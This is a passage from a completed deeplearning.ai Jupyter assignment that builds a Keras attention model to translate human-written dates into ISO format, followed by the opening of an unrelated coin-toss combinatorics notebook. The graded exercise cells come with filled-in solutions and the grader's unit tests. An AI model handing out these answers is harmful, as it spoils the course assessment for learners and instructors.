"# UNIT TEST\ndef one_step_attention_test(target):\n\n m = 10\n Tx = 30\n n_a = 32\n n_s = 64\n #np.random.seed(10)\n a = np.random.uniform(1, 0, (m, Tx, 2 * n_a)).astype(np.float32)\n s_prev =np.random.uniform(1, 0, (m, n_s)).astype(np.float32) * 1\n context = target(a, s_prev)\n \n assert type(context) == tf.python.framework.ops.EagerTensor, \"Unexpected type. It should be a Tensor\"\n assert tuple(context.shape) == (m, 1, n_s), \"Unexpected output shape\"\n assert np.all(context.numpy() > 0), \"All output values must be > 0 in this example\"\n assert np.all(context.numpy() < 1), \"All output values must be < 1 in this example\"\n\n #assert np.allclose(context[0][0][0:5].numpy(), [0.50877404, 0.57160693, 0.45448175, 0.50074816, 0.53651875]), \"Unexpected values in the result\"\n print(\"\\033[92mAll tests passed!\")\n \none_step_attention_test(one_step_attention)",
"\u001b[92mAll tests passed!\n"
]
],
[
[
"<a name='ex-2'></a>\n### Exercise 2 - modelf\n\nImplement `modelf()` as explained in figure 1 and the instructions:\n\n* `modelf` first runs the input through a Bi-LSTM to get $[a^{<1>},a^{<2>}, ..., a^{<T_x>}]$. \n* Then, `modelf` calls `one_step_attention()` $T_y$ times using a `for` loop. At each iteration of this loop:\n - It gives the computed context vector $context^{<t>}$ to the post-attention LSTM.\n - It runs the output of the post-attention LSTM through a dense layer with softmax activation.\n - The softmax generates a prediction $\\hat{y}^{<t>}$.\n \nAgain, we have defined global layers that will share weights to be used in `modelf()`.",
"_____no_output_____"
]
],
[
[
"n_a = 32 # number of units for the pre-attention, bi-directional LSTM's hidden state 'a'\nn_s = 64 # number of units for the post-attention LSTM's hidden state \"s\"\n\n# Please note, this is the post attention LSTM cell. \npost_activation_LSTM_cell = LSTM(n_s, return_state = True) # Please do not modify this global variable.\noutput_layer = Dense(len(machine_vocab), activation=softmax)",
"_____no_output_____"
]
],
[
[
"Now you can use these layers $T_y$ times in a `for` loop to generate the outputs, and their parameters will not be reinitialized. You will have to carry out the following steps: \n\n1. Propagate the input `X` into a bi-directional LSTM.\n * [Bidirectional](https://keras.io/layers/wrappers/#bidirectional) \n * [LSTM](https://keras.io/layers/recurrent/#lstm)\n * Remember that we want the LSTM to return a full sequence instead of just the last hidden state. \n \nSample code:\n\n```Python\nsequence_of_hidden_states = Bidirectional(LSTM(units=..., return_sequences=...))(the_input_X)\n```\n \n2. Iterate for $t = 0, \\cdots, T_y-1$: \n 1. Call `one_step_attention()`, passing in the sequence of hidden states $[a^{\\langle 1 \\rangle},a^{\\langle 2 \\rangle}, ..., a^{ \\langle T_x \\rangle}]$ from the pre-attention bi-directional LSTM, and the previous hidden state $s^{<t-1>}$ from the post-attention LSTM to calculate the context vector $context^{<t>}$.\n 2. Give $context^{<t>}$ to the post-attention LSTM cell. \n - Remember to pass in the previous hidden-state $s^{\\langle t-1\\rangle}$ and cell-states $c^{\\langle t-1\\rangle}$ of this LSTM \n * This outputs the new hidden state $s^{<t>}$ and the new cell state $c^{<t>}$. \n\n Sample code:\n ```Python\n next_hidden_state, _ , next_cell_state = \n post_activation_LSTM_cell(inputs=..., initial_state=[prev_hidden_state, prev_cell_state])\n ``` \n Please note that the layer is actually the \"post attention LSTM cell\". For the purposes of passing the automatic grader, please do not modify the naming of this global variable. This will be fixed when we deploy updates to the automatic grader.\n 3. Apply a dense, softmax layer to $s^{<t>}$, get the output. \n Sample code:\n ```Python\n output = output_layer(inputs=...)\n ```\n 4. Save the output by adding it to the list of outputs.\n\n3. Create your Keras model instance.\n * It should have three inputs:\n * `X`, the one-hot encoded inputs to the model, of shape ($T_{x}, humanVocabSize)$\n * $s^{\\langle 0 \\rangle}$, the initial hidden state of the post-attention LSTM\n * $c^{\\langle 0 \\rangle}$, the initial cell state of the post-attention LSTM\n * The output is the list of outputs. \n Sample code\n ```Python\n model = Model(inputs=[...,...,...], outputs=...)\n ```",
"_____no_output_____"
]
],
[
[
"# UNQ_C2 (UNIQUE CELL IDENTIFIER, DO NOT EDIT)\n# GRADED FUNCTION: model\n\ndef modelf(Tx, Ty, n_a, n_s, human_vocab_size, machine_vocab_size):\n \"\"\"\n Arguments:\n Tx -- length of the input sequence\n Ty -- length of the output sequence\n n_a -- hidden state size of the Bi-LSTM\n n_s -- hidden state size of the post-attention LSTM\n human_vocab_size -- size of the python dictionary \"human_vocab\"\n machine_vocab_size -- size of the python dictionary \"machine_vocab\"\n\n Returns:\n model -- Keras model instance\n \"\"\"\n \n # Define the inputs of your model with a shape (Tx,)\n # Define s0 (initial hidden state) and c0 (initial cell state)\n # for the decoder LSTM with shape (n_s,)\n X = Input(shape=(Tx, human_vocab_size))\n s0 = Input(shape=(n_s,), name='s0')\n c0 = Input(shape=(n_s,), name='c0')\n s = s0\n c = c0\n \n # Initialize empty list of outputs\n outputs = []\n \n ### START CODE HERE ###\n \n # Step 1: Define your pre-attention Bi-LSTM. (≈ 1 line)\n a = Bidirectional(LSTM(units=n_a, return_sequences=True))(X)\n \n # Step 2: Iterate for Ty steps\n for t in range(Ty):\n \n # Step 2.A: Perform one step of the attention mechanism to get back the context vector at step t (≈ 1 line)\n context = one_step_attention(a, s)\n \n # Step 2.B: Apply the post-attention LSTM cell to the \"context\" vector.\n # Don't forget to pass: initial_state = [hidden state, cell state] (≈ 1 line)\n s, _, c = post_activation_LSTM_cell(context, initial_state=[s, c])\n \n # Step 2.C: Apply Dense layer to the hidden state output of the post-attention LSTM (≈ 1 line)\n out = output_layer(s)\n \n # Step 2.D: Append \"out\" to the \"outputs\" list (≈ 1 line)\n outputs.append(out)\n \n # Step 3: Create model instance taking three inputs and returning the list of outputs. (≈ 1 line)\n model = Model(inputs=[X, s0, c0], outputs=outputs)\n \n ### END CODE HERE ###\n \n return model",
"_____no_output_____"
],
[
"# UNIT TEST\nfrom test_utils import *\n\ndef modelf_test(target):\n m = 10\n Tx = 30\n n_a = 32\n n_s = 64\n len_human_vocab = 37\n len_machine_vocab = 11\n \n \n model = target(Tx, Ty, n_a, n_s, len_human_vocab, len_machine_vocab)\n \n print(summary(model))\n\n \n expected_summary = [['InputLayer', [(None, 30, 37)], 0],\n ['InputLayer', [(None, 64)], 0],\n ['Bidirectional', (None, 30, 64), 17920],\n ['RepeatVector', (None, 30, 64), 0, 30],\n ['Concatenate', (None, 30, 128), 0],\n ['Dense', (None, 30, 10), 1290, 'tanh'],\n ['Dense', (None, 30, 1), 11, 'relu'],\n ['Activation', (None, 30, 1), 0],\n ['Dot', (None, 1, 64), 0],\n ['InputLayer', [(None, 64)], 0],\n ['LSTM',[(None, 64), (None, 64), (None, 64)], 33024,[(None, 1, 64), (None, 64), (None, 64)],'tanh'],\n ['Dense', (None, 11), 715, 'softmax']]\n\n assert len(model.outputs) == 10, f\"Wrong output shape. Expected 10 != {len(model.outputs)}\"\n\n comparator(summary(model), expected_summary)\n \n\nmodelf_test(modelf)",
"[['InputLayer', [(None, 30, 37)], 0], ['InputLayer', [(None, 64)], 0], ['Bidirectional', (None, 30, 64), 17920], ['RepeatVector', (None, 30, 64), 0, 30], ['Concatenate', (None, 30, 128), 0], ['Dense', (None, 30, 10), 1290, 'tanh'], ['Dense', (None, 30, 1), 11, 'relu'], ['Activation', (None, 30, 1), 0], ['Dot', (None, 1, 64), 0], ['InputLayer', [(None, 64)], 0], ['LSTM', [(None, 64), (None, 64), (None, 64)], 33024, [(None, 1, 64), (None, 64), (None, 64)], 'tanh'], ['Dense', (None, 11), 715, 'softmax']]\n\u001b[32mAll tests passed!\u001b[0m\n"
]
],
[
[
"Run the following cell to create your model.",
"_____no_output_____"
]
],
[
[
"model = modelf(Tx, Ty, n_a, n_s, len(human_vocab), len(machine_vocab))",
"_____no_output_____"
]
],
[
[
"#### Troubleshooting Note\n* If you are getting repeated errors after an initially incorrect implementation of \"model\", but believe that you have corrected the error, you may still see error messages when building your model. \n* A solution is to save and restart your kernel (or shutdown then restart your notebook), and re-run the cells.",
"_____no_output_____"
],
[
"Let's get a summary of the model to check if it matches the expected output.",
"_____no_output_____"
]
],
[
[
"model.summary()",
"Model: \"functional_13\"\n__________________________________________________________________________________________________\nLayer (type) Output Shape Param # Connected to \n==================================================================================================\ninput_9 (InputLayer) [(None, 30, 37)] 0 \n__________________________________________________________________________________________________\ns0 (InputLayer) [(None, 64)] 0 \n__________________________________________________________________________________________________\nbidirectional_8 (Bidirectional) (None, 30, 64) 17920 input_9[0][0] \n__________________________________________________________________________________________________\nrepeat_vector_1 (RepeatVector) (None, 30, 64) 0 s0[0][0] \n lstm_3[60][0] \n lstm_3[61][0] \n lstm_3[62][0] \n lstm_3[63][0] \n lstm_3[64][0] \n lstm_3[65][0] \n lstm_3[66][0] \n lstm_3[67][0] \n lstm_3[68][0] \n__________________________________________________________________________________________________\nconcatenate_1 (Concatenate) (None, 30, 128) 0 bidirectional_8[0][0] \n repeat_vector_1[61][0] \n bidirectional_8[0][0] \n repeat_vector_1[62][0] \n bidirectional_8[0][0] \n repeat_vector_1[63][0] \n bidirectional_8[0][0] \n repeat_vector_1[64][0] \n bidirectional_8[0][0] \n repeat_vector_1[65][0] \n bidirectional_8[0][0] \n repeat_vector_1[66][0] \n bidirectional_8[0][0] \n repeat_vector_1[67][0] \n bidirectional_8[0][0] \n repeat_vector_1[68][0] \n bidirectional_8[0][0] \n repeat_vector_1[69][0] \n bidirectional_8[0][0] \n repeat_vector_1[70][0] \n__________________________________________________________________________________________________\ndense_2 (Dense) (None, 30, 10) 1290 concatenate_1[61][0] \n concatenate_1[62][0] \n concatenate_1[63][0] \n concatenate_1[64][0] \n concatenate_1[65][0] \n concatenate_1[66][0] \n concatenate_1[67][0] \n concatenate_1[68][0] \n concatenate_1[69][0] \n concatenate_1[70][0] \n__________________________________________________________________________________________________\ndense_3 (Dense) (None, 30, 1) 11 dense_2[61][0] \n dense_2[62][0] \n dense_2[63][0] \n dense_2[64][0] \n dense_2[65][0] \n dense_2[66][0] \n dense_2[67][0] \n dense_2[68][0] \n dense_2[69][0] \n dense_2[70][0] \n__________________________________________________________________________________________________\nattention_weights (Activation) (None, 30, 1) 0 dense_3[61][0] \n dense_3[62][0] \n dense_3[63][0] \n dense_3[64][0] \n dense_3[65][0] \n dense_3[66][0] \n dense_3[67][0] \n dense_3[68][0] \n dense_3[69][0] \n dense_3[70][0] \n__________________________________________________________________________________________________\ndot_1 (Dot) (None, 1, 64) 0 attention_weights[61][0] \n bidirectional_8[0][0] \n attention_weights[62][0] \n bidirectional_8[0][0] \n attention_weights[63][0] \n bidirectional_8[0][0] \n attention_weights[64][0] \n bidirectional_8[0][0] \n attention_weights[65][0] \n bidirectional_8[0][0] \n attention_weights[66][0] \n bidirectional_8[0][0] \n attention_weights[67][0] \n bidirectional_8[0][0] \n attention_weights[68][0] \n bidirectional_8[0][0] \n attention_weights[69][0] \n bidirectional_8[0][0] \n attention_weights[70][0] \n bidirectional_8[0][0] \n__________________________________________________________________________________________________\nc0 (InputLayer) [(None, 64)] 0 \n__________________________________________________________________________________________________\nlstm_3 (LSTM) [(None, 64), (None, 33024 dot_1[61][0] \n s0[0][0] \n c0[0][0] \n dot_1[62][0] \n lstm_3[60][0] \n lstm_3[60][2] \n dot_1[63][0] \n lstm_3[61][0] \n lstm_3[61][2] \n dot_1[64][0] \n lstm_3[62][0] \n lstm_3[62][2] \n dot_1[65][0] \n lstm_3[63][0] \n lstm_3[63][2] \n dot_1[66][0] \n lstm_3[64][0] \n lstm_3[64][2] \n dot_1[67][0] \n lstm_3[65][0] \n lstm_3[65][2] \n dot_1[68][0] \n lstm_3[66][0] \n lstm_3[66][2] \n dot_1[69][0] \n lstm_3[67][0] \n lstm_3[67][2] \n dot_1[70][0] \n lstm_3[68][0] \n lstm_3[68][2] \n__________________________________________________________________________________________________\ndense_5 (Dense) (None, 11) 715 lstm_3[60][0] \n lstm_3[61][0] \n lstm_3[62][0] \n lstm_3[63][0] \n lstm_3[64][0] \n lstm_3[65][0] \n lstm_3[66][0] \n lstm_3[67][0] \n lstm_3[68][0] \n lstm_3[69][0] \n==================================================================================================\nTotal params: 52,960\nTrainable params: 52,960\nNon-trainable params: 0\n__________________________________________________________________________________________________\n"
]
],
[
[
"**Expected Output**:\n\nHere is the summary you should see\n<table>\n <tr>\n <td>\n **Total params:**\n </td>\n <td>\n 52,960\n </td>\n </tr>\n <tr>\n <td>\n **Trainable params:**\n </td>\n <td>\n 52,960\n </td>\n </tr>\n <tr>\n <td>\n **Non-trainable params:**\n </td>\n <td>\n 0\n </td>\n </tr>\n <tr>\n <td>\n **bidirectional_1's output shape **\n </td>\n <td>\n (None, 30, 64) \n </td>\n </tr>\n <tr>\n <td>\n **repeat_vector_1's output shape **\n </td>\n <td>\n (None, 30, 64) \n </td>\n </tr>\n <tr>\n <td>\n **concatenate_1's output shape **\n </td>\n <td>\n (None, 30, 128) \n </td>\n </tr>\n <tr>\n <td>\n **attention_weights's output shape **\n </td>\n <td>\n (None, 30, 1) \n </td>\n </tr>\n <tr>\n <td>\n **dot_1's output shape **\n </td>\n <td>\n (None, 1, 64)\n </td>\n </tr>\n <tr>\n <td>\n **dense_3's output shape **\n </td>\n <td>\n (None, 11) \n </td>\n </tr>\n</table>\n",
"_____no_output_____"
],
[
"<a name='ex-3'></a>\n### Exercise 3 - Compile the Model\n\n* After creating your model in Keras, you need to compile it and define the loss function, optimizer and metrics you want to use. \n * Loss function: 'categorical_crossentropy'.\n * Optimizer: [Adam](https://keras.io/optimizers/#adam) [optimizer](https://keras.io/optimizers/#usage-of-optimizers)\n - learning rate = 0.005 \n - $\\beta_1 = 0.9$\n - $\\beta_2 = 0.999$\n - decay = 0.01 \n * metric: 'accuracy'\n \nSample code\n```Python\noptimizer = Adam(lr=..., beta_1=..., beta_2=..., decay=...)\nmodel.compile(optimizer=..., loss=..., metrics=[...])\n```",
"_____no_output_____"
]
],
[
[
"### START CODE HERE ### (≈2 lines)\nopt = Adam(lr=0.005, beta_1=0.9, beta_2=0.999, decay=0.01) \nmodel.compile(loss = 'categorical_crossentropy', optimizer = opt, metrics = ['accuracy'])\n### END CODE HERE ###",
"_____no_output_____"
],
[
"# UNIT TESTS\nassert opt.lr == 0.005, \"Set the lr parameter to 0.005\"\nassert opt.beta_1 == 0.9, \"Set the beta_1 parameter to 0.9\"\nassert opt.beta_2 == 0.999, \"Set the beta_2 parameter to 0.999\"\nassert opt.decay == 0.01, \"Set the decay parameter to 0.01\"\nassert model.loss == \"categorical_crossentropy\", \"Wrong loss. Use 'categorical_crossentropy'\"\nassert model.optimizer == opt, \"Use the optimizer that you have instantiated\"\nassert model.compiled_metrics._user_metrics[0] == 'accuracy', \"set metrics to ['accuracy']\"\n\nprint(\"\\033[92mAll tests passed!\")",
"\u001b[92mAll tests passed!\n"
]
],
[
[
"#### Define inputs and outputs, and fit the model\nThe last step is to define all your inputs and outputs to fit the model:\n- You have input X of shape $(m = 10000, T_x = 30)$ containing the training examples.\n- You need to create `s0` and `c0` to initialize your `post_attention_LSTM_cell` with zeros.\n- Given the `model()` you coded, you need the \"outputs\" to be a list of 10 elements of shape (m, T_y). \n - The list `outputs[i][0], ..., outputs[i][Ty]` represents the true labels (characters) corresponding to the $i^{th}$ training example (`X[i]`). \n - `outputs[i][j]` is the true label of the $j^{th}$ character in the $i^{th}$ training example.",
"_____no_output_____"
]
],
[
[
"s0 = np.zeros((m, n_s))\nc0 = np.zeros((m, n_s))\noutputs = list(Yoh.swapaxes(0,1))",
"_____no_output_____"
]
],
[
[
"Let's now fit the model and run it for one epoch.",
"_____no_output_____"
]
],
[
[
"model.fit([Xoh, s0, c0], outputs, epochs=1, batch_size=100)",
"100/100 [==============================] - 10s 101ms/step - loss: 16.5259 - dense_5_loss: 1.2274 - dense_5_1_loss: 0.9505 - dense_5_2_loss: 1.7137 - dense_5_3_loss: 2.6582 - dense_5_4_loss: 0.7633 - dense_5_5_loss: 1.2655 - dense_5_6_loss: 2.7714 - dense_5_7_loss: 0.9110 - dense_5_8_loss: 1.7310 - dense_5_9_loss: 2.5339 - dense_5_accuracy: 0.5007 - dense_5_1_accuracy: 0.7171 - dense_5_2_accuracy: 0.3122 - dense_5_3_accuracy: 0.0918 - dense_5_4_accuracy: 0.9454 - dense_5_5_accuracy: 0.3345 - dense_5_6_accuracy: 0.0512 - dense_5_7_accuracy: 0.9499 - dense_5_8_accuracy: 0.2543 - dense_5_9_accuracy: 0.1094\n"
]
],
[
[
"While training you can see the loss as well as the accuracy on each of the 10 positions of the output. The table below gives you an example of what the accuracies could be if the batch had 2 examples: \n\n<img src=\"images/table.png\" style=\"width:700;height:200px;\"> <br>\n<caption><center>Thus, `dense_2_acc_8: 0.89` means that you are predicting the 7th character of the output correctly 89% of the time in the current batch of data. </center></caption>\n\n\nWe have run this model for longer, and saved the weights. Run the next cell to load our weights. (By training a model for several minutes, you should be able to obtain a model of similar accuracy, but loading our model will save you time.) ",
"_____no_output_____"
]
],
[
[
"model.load_weights('models/model.h5')",
"_____no_output_____"
]
],
[
[
"You can now see the results on new examples.",
"_____no_output_____"
]
],
[
[
"EXAMPLES = ['3 May 1979', '5 April 09', '21th of August 2016', 'Tue 10 Jul 2007', 'Saturday May 9 2018', 'March 3 2001', 'March 3rd 2001', '1 March 2001']\ns00 = np.zeros((1, n_s))\nc00 = np.zeros((1, n_s))\nfor example in EXAMPLES:\n source = string_to_int(example, Tx, human_vocab)\n #print(source)\n source = np.array(list(map(lambda x: to_categorical(x, num_classes=len(human_vocab)), source))).swapaxes(0,1)\n source = np.swapaxes(source, 0, 1)\n source = np.expand_dims(source, axis=0)\n prediction = model.predict([source, s00, c00])\n prediction = np.argmax(prediction, axis = -1)\n output = [inv_machine_vocab[int(i)] for i in prediction]\n print(\"source:\", example)\n print(\"output:\", ''.join(output),\"\\n\")",
"source: 3 May 1979\noutput: 1979-05-33 \n\nsource: 5 April 09\noutput: 2009-04-05 \n\nsource: 21th of August 2016\noutput: 2016-08-20 \n\nsource: Tue 10 Jul 2007\noutput: 2007-07-10 \n\nsource: Saturday May 9 2018\noutput: 2018-05-09 \n\nsource: March 3 2001\noutput: 2001-03-03 \n\nsource: March 3rd 2001\noutput: 2001-03-03 \n\nsource: 1 March 2001\noutput: 2001-03-01 \n\n"
]
],
[
[
"You can also change these examples to test with your own examples. The next part will give you a better sense of what the attention mechanism is doing--i.e., what part of the input the network is paying attention to when generating a particular output character. ",
"_____no_output_____"
],
[
"<a name='3'></a>\n## 3 - Visualizing Attention (Optional / Ungraded)\n\nSince the problem has a fixed output length of 10, it is also possible to carry out this task using 10 different softmax units to generate the 10 characters of the output. But one advantage of the attention model is that each part of the output (such as the month) knows it needs to depend only on a small part of the input (the characters in the input giving the month). We can visualize what each part of the output is looking at which part of the input.\n\nConsider the task of translating \"Saturday 9 May 2018\" to \"2018-05-09\". If we visualize the computed $\\alpha^{\\langle t, t' \\rangle}$ we get this: \n\n<img src=\"images/date_attention.png\" style=\"width:600;height:300px;\"> <br>\n<caption><center> **Figure 8**: Full Attention Map</center></caption>\n\nNotice how the output ignores the \"Saturday\" portion of the input. None of the output timesteps are paying much attention to that portion of the input. We also see that 9 has been translated as 09 and May has been correctly translated into 05, with the output paying attention to the parts of the input it needs to to make the translation. The year mostly requires it to pay attention to the input's \"18\" in order to generate \"2018.\" ",
"_____no_output_____"
],
[
"<a name='3-1'></a>\n### 3.1 - Getting the Attention Weights From the Network\n\nLets now visualize the attention values in your network. We'll propagate an example through the network, then visualize the values of $\\alpha^{\\langle t, t' \\rangle}$. \n\nTo figure out where the attention values are located, let's start by printing a summary of the model .",
"_____no_output_____"
]
],
[
[
"model.summary()",
"Model: \"functional_13\"\n__________________________________________________________________________________________________\nLayer (type) Output Shape Param # Connected to \n==================================================================================================\ninput_9 (InputLayer) [(None, 30, 37)] 0 \n__________________________________________________________________________________________________\ns0 (InputLayer) [(None, 64)] 0 \n__________________________________________________________________________________________________\nbidirectional_8 (Bidirectional) (None, 30, 64) 17920 input_9[0][0] \n__________________________________________________________________________________________________\nrepeat_vector_1 (RepeatVector) (None, 30, 64) 0 s0[0][0] \n lstm_3[60][0] \n lstm_3[61][0] \n lstm_3[62][0] \n lstm_3[63][0] \n lstm_3[64][0] \n lstm_3[65][0] \n lstm_3[66][0] \n lstm_3[67][0] \n lstm_3[68][0] \n__________________________________________________________________________________________________\nconcatenate_1 (Concatenate) (None, 30, 128) 0 bidirectional_8[0][0] \n repeat_vector_1[61][0] \n bidirectional_8[0][0] \n repeat_vector_1[62][0] \n bidirectional_8[0][0] \n repeat_vector_1[63][0] \n bidirectional_8[0][0] \n repeat_vector_1[64][0] \n bidirectional_8[0][0] \n repeat_vector_1[65][0] \n bidirectional_8[0][0] \n repeat_vector_1[66][0] \n bidirectional_8[0][0] \n repeat_vector_1[67][0] \n bidirectional_8[0][0] \n repeat_vector_1[68][0] \n bidirectional_8[0][0] \n repeat_vector_1[69][0] \n bidirectional_8[0][0] \n repeat_vector_1[70][0] \n__________________________________________________________________________________________________\ndense_2 (Dense) (None, 30, 10) 1290 concatenate_1[61][0] \n concatenate_1[62][0] \n concatenate_1[63][0] \n concatenate_1[64][0] \n concatenate_1[65][0] \n concatenate_1[66][0] \n concatenate_1[67][0] \n concatenate_1[68][0] \n concatenate_1[69][0] \n concatenate_1[70][0] \n__________________________________________________________________________________________________\ndense_3 (Dense) (None, 30, 1) 11 dense_2[61][0] \n dense_2[62][0] \n dense_2[63][0] \n dense_2[64][0] \n dense_2[65][0] \n dense_2[66][0] \n dense_2[67][0] \n dense_2[68][0] \n dense_2[69][0] \n dense_2[70][0] \n__________________________________________________________________________________________________\nattention_weights (Activation) (None, 30, 1) 0 dense_3[61][0] \n dense_3[62][0] \n dense_3[63][0] \n dense_3[64][0] \n dense_3[65][0] \n dense_3[66][0] \n dense_3[67][0] \n dense_3[68][0] \n dense_3[69][0] \n dense_3[70][0] \n__________________________________________________________________________________________________\ndot_1 (Dot) (None, 1, 64) 0 attention_weights[61][0] \n bidirectional_8[0][0] \n attention_weights[62][0] \n bidirectional_8[0][0] \n attention_weights[63][0] \n bidirectional_8[0][0] \n attention_weights[64][0] \n bidirectional_8[0][0] \n attention_weights[65][0] \n bidirectional_8[0][0] \n attention_weights[66][0] \n bidirectional_8[0][0] \n attention_weights[67][0] \n bidirectional_8[0][0] \n attention_weights[68][0] \n bidirectional_8[0][0] \n attention_weights[69][0] \n bidirectional_8[0][0] \n attention_weights[70][0] \n bidirectional_8[0][0] \n__________________________________________________________________________________________________\nc0 (InputLayer) [(None, 64)] 0 \n__________________________________________________________________________________________________\nlstm_3 (LSTM) [(None, 64), (None, 33024 dot_1[61][0] \n s0[0][0] \n c0[0][0] \n dot_1[62][0] \n lstm_3[60][0] \n lstm_3[60][2] \n dot_1[63][0] \n lstm_3[61][0] \n lstm_3[61][2] \n dot_1[64][0] \n lstm_3[62][0] \n lstm_3[62][2] \n dot_1[65][0] \n lstm_3[63][0] \n lstm_3[63][2] \n dot_1[66][0] \n lstm_3[64][0] \n lstm_3[64][2] \n dot_1[67][0] \n lstm_3[65][0] \n lstm_3[65][2] \n dot_1[68][0] \n lstm_3[66][0] \n lstm_3[66][2] \n dot_1[69][0] \n lstm_3[67][0] \n lstm_3[67][2] \n dot_1[70][0] \n lstm_3[68][0] \n lstm_3[68][2] \n__________________________________________________________________________________________________\ndense_5 (Dense) (None, 11) 715 lstm_3[60][0] \n lstm_3[61][0] \n lstm_3[62][0] \n lstm_3[63][0] \n lstm_3[64][0] \n lstm_3[65][0] \n lstm_3[66][0] \n lstm_3[67][0] \n lstm_3[68][0] \n lstm_3[69][0] \n==================================================================================================\nTotal params: 52,960\nTrainable params: 52,960\nNon-trainable params: 0\n__________________________________________________________________________________________________\n"
]
],
[
[
"Navigate through the output of `model.summary()` above. You can see that the layer named `attention_weights` outputs the `alphas` of shape (m, 30, 1) before `dot_2` computes the context vector for every time step $t = 0, \\ldots, T_y-1$. Let's get the attention weights from this layer.\n\nThe function `attention_map()` pulls out the attention values from your model and plots them.\n\n**Note**: We are aware that you might run into an error running the cell below despite a valid implementation for Exercise 2 - `modelf` above. If you get the error kindly report it on this [Topic](https://discourse.deeplearning.ai/t/error-in-optional-ungraded-part-of-neural-machine-translation-w3a1/1096) on [Discourse](https://discourse.deeplearning.ai) as it'll help us improve our content. \n\nIf you haven’t joined our Discourse community you can do so by clicking on the link: http://bit.ly/dls-discourse\n\nAnd don’t worry about the error, it will not affect the grading for this assignment.",
"_____no_output_____"
]
],
[
[
"attention_map = plot_attention_map(model, human_vocab, inv_machine_vocab, \"Tuesday 09 Oct 1993\", num = 7, n_s = 64);",
"_____no_output_____"
]
],
[
[
"On the generated plot you can observe the values of the attention weights for each character of the predicted output. Examine this plot and check that the places where the network is paying attention makes sense to you.\n\nIn the date translation application, you will observe that most of the time attention helps predict the year, and doesn't have much impact on predicting the day or month.",
"_____no_output_____"
],
[
"### Congratulations!\n\n\nYou have come to the end of this assignment \n\n#### Here's what you should remember\n\n- Machine translation models can be used to map from one sequence to another. They are useful not just for translating human languages (like French->English) but also for tasks like date format translation. \n- An attention mechanism allows a network to focus on the most relevant parts of the input when producing a specific part of the output. \n- A network using an attention mechanism can translate from inputs of length $T_x$ to outputs of length $T_y$, where $T_x$ and $T_y$ can be different. \n- You can visualize attention weights $\\alpha^{\\langle t,t' \\rangle}$ to see what the network is paying attention to while generating each output.",
"_____no_output_____"
],
[
"Congratulations on finishing this assignment! You are now able to implement an attention model and use it to learn complex mappings from one sequence to another. ",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
]
] |
e7060a370da0e3cb27ad380125125296155ad6c1 | 46,923 | ipynb | Jupyter Notebook | Mathematics/Statistics/Statistics and Probability Python Notebooks/Combinatorics, Probability, and Stats/Heads_or_tails.ipynb | okara83/Becoming-a-Data-Scientist | f09a15f7f239b96b77a2f080c403b2f3e95c9650 | [
"MIT"
] | null | null | null | Mathematics/Statistics/Statistics and Probability Python Notebooks/Combinatorics, Probability, and Stats/Heads_or_tails.ipynb | okara83/Becoming-a-Data-Scientist | f09a15f7f239b96b77a2f080c403b2f3e95c9650 | [
"MIT"
] | null | null | null | Mathematics/Statistics/Statistics and Probability Python Notebooks/Combinatorics, Probability, and Stats/Heads_or_tails.ipynb | okara83/Becoming-a-Data-Scientist | f09a15f7f239b96b77a2f080c403b2f3e95c9650 | [
"MIT"
] | 2 | 2022-02-09T15:41:33.000Z | 2022-02-11T07:47:40.000Z | 30.059577 | 299 | 0.375488 | [
[
[
"## Import dependencies",
"_____no_output_____"
]
],
[
[
"import numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\nfrom numpy.linalg import matrix_power\nfrom scipy.special import comb\nfrom scipy.signal import convolve2d\nfrom sklearn.preprocessing import minmax_scale",
"_____no_output_____"
]
],
[
[
"## Define functions",
"_____no_output_____"
]
],
[
[
"def drawHeatmapMatrix(M, labels, xlabels, ylabels, \n contrast=1/200, \n format='.2f', \n cmap = \"Blues\",\n normalize = 'rows',\n cbar = True):\n M2 = convolve2d(M, np.array([[-1,-3,-1],[-3,17,-3],[-1,-3,-1]]), mode = 'same', boundary=\"symm\")\n\n if normalize == 'all':\n # scale to actual range\n hi=np.max(M)\n lo=np.min(M)\n M2 = M2*contrast+M \n M2 = (M2-np.min(M2))/(np.max(M2)-np.min(M2))*(hi-lo)+lo\n elif normalize == 'columns':\n M2 = minmax_scale(M2*contrast+M, feature_range=(np.min(M), np.max(M)), axis=0)\n else:\n # scaling by columns or rows:\n M2 = minmax_scale(M2*contrast+M, feature_range=(np.min(M), np.max(M)), axis=1)\n\n sns.heatmap(M2,\n annot = labels,\n center = 0.1, \n fmt = format,\n square = True, \n linewidths = 2,\n robust = True,\n xticklabels = xlabels,\n yticklabels = ylabels,\n cmap = cmap,\n cbar = cbar, \n #cbar_kws = dict(ticks=[.0, .25, .5], shrink=0.82) \n cbar_kws = dict(shrink=0.82)\n )",
"_____no_output_____"
]
],
[
[
"# Brute Force\nA sequence of $N$ head or tails outcomes can be represented as a binary number in the range $[0, 2^{N}-1]$, e.g. $01111 11111$ would mean a head followed by nine tails. \n\nThe following code lists all combinations using binary numbers head=0 and tail=1.",
"_____no_output_____"
]
],
[
[
